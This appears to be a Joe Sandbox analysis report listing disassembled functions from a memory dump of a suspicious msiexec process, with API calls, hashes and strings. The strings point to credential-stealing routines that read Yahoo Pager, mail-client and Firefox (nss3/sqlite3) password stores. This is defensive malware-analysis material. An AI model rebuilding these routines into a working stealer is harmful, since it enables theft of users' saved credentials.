                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                      • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                    • String ID:
                                                                    • API String ID: 3503910906-0
                                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                    Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C922
                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                    • String ID:
                                                                    • API String ID: 3798638045-0
                                                                    • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                    • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                    • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                    • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                    Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                    • atoi.MSVCRT(?), ref: 0040B619
                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                    • String ID:
                                                                    • API String ID: 4107816708-0
                                                                    • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                    • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                    Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                    • _gmtime64.MSVCRT ref: 00411437
                                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                    • strftime.MSVCRT ref: 00411476
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                    • String ID:
                                                                    • API String ID: 1886415126-0
                                                                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                    Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen
                                                                    • String ID: >$>$>
                                                                    • API String ID: 39653677-3911187716
                                                                    • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                    • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                    Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: @
                                                                    • API String ID: 3510742995-2766056989
                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                    Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _strcmpi
                                                                    • String ID: C@$mail.identity
                                                                    • API String ID: 1439213657-721921413
                                                                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                    Function 00444551 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00444573
                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValuememset
                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                    • API String ID: 3363972335-1703613266
                                                                    • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                    • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                    Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00406640
                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                    • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset$memcmp
                                                                    • String ID: Ul@
                                                                    • API String ID: 270934217-715280498
                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                    Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                    • sprintf.MSVCRT ref: 0040B929
                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                    • sprintf.MSVCRT ref: 0040B953
                                                                    • _mbscat.MSVCRT ref: 0040B966
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                    • String ID:
                                                                    • API String ID: 203655857-0
                                                                    • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                    • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                    • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                    • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                    Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                    Strings
                                                                    • recovered %d pages from %s, xrefs: 004188B4
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                    • String ID: recovered %d pages from %s
                                                                    • API String ID: 985450955-1623757624
                                                                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                    Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _ultoasprintf
                                                                    • String ID: %s %s %s
                                                                    • API String ID: 432394123-3850900253
                                                                    • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                    • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                    • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                    • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                    Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00409919
                                                                    • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendmemset
                                                                    • String ID: N\@
                                                                    • API String ID: 568519121-3851889168
                                                                    • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                    • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                    • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                    • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                    Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadMenuA.USER32(00000000), ref: 00409078
                                                                    • sprintf.MSVCRT ref: 0040909B
                                                                      • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                      • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                      • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                      • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                      • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                      • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                    • String ID: menu_%d
                                                                    • API String ID: 1129539653-2417748251
                                                                    • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                    • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                    • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                    • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                    Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _msizerealloc
                                                                    • String ID: failed memory resize %u to %u bytes
                                                                    • API String ID: 2713192863-2134078882
                                                                    • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                    • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                    • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                    • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                    Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                    • strrchr.MSVCRT ref: 00409808
                                                                    • _mbscat.MSVCRT ref: 0040981D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FileModuleName_mbscatstrrchr
                                                                    • String ID: _lng.ini
                                                                    • API String ID: 3334749609-1948609170
                                                                    • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                    • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                    • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                    • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                    Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                      • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                      • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                    • _mbscat.MSVCRT ref: 004070FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscat$_mbscpystrlen
                                                                    • String ID: sqlite3.dll
                                                                    • API String ID: 1983510840-1155512374
                                                                    • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                    • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                    • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                    • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                    Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString
                                                                    • String ID: A4@$Server Details
                                                                    • API String ID: 1096422788-4071850762
                                                                    • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                    • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                    • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                    • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                    Function 0042C821 Relevance: 5.2, APIs: 4, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                    • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                    • memset.MSVCRT ref: 0042C932
                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memset
                                                                    • String ID:
                                                                    • API String ID: 438689982-0
                                                                    • Opcode ID: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                    • Instruction ID: 02088d5bd302ba8124152156f4c24fba1fa2279ed4138068a4a2dd0dfc44ef6b
                                                                    • Opcode Fuzzy Hash: 3e8938812e192c77fa2f1ca69e9b365f101ee6c3f919cceff69a24fa811216df
                                                                    • Instruction Fuzzy Hash: BC61BDB2604712AFD710DF65E8C1B2BB7E5FF84304F40892EF99896250D338E955CB9A
                                                                    Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 0040849A
                                                                    • memset.MSVCRT ref: 004084D2
                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,67CE7B60,?,00000000), ref: 0040858F
                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,67CE7B60,?,00000000), ref: 004085BA
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLocalmemcpymemsetstrlen
                                                                    • String ID:
                                                                    • API String ID: 3110682361-0
                                                                    • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                    • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                    • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                    • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                    Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID:
                                                                    • API String ID: 3510742995-0
                                                                    • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                    • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                    • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                    • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                                    Function 0040998E Relevance: 5.1, APIs: 4, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099A3
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099CC
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 004099ED
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D), ref: 00409A0E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@$memset
                                                                    • String ID:
                                                                    • API String ID: 1860491036-0
                                                                    • Opcode ID: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
                                                                    • Instruction ID: ded700a689dc4ea077b1bf28e8ae47d2b9e76a7afd7a7e1dd26f08861e755b16
                                                                    • Opcode Fuzzy Hash: 53a709b0ebb70c131a26b1f3e55d335129ca60e454a525cf22a7fedf29ded436
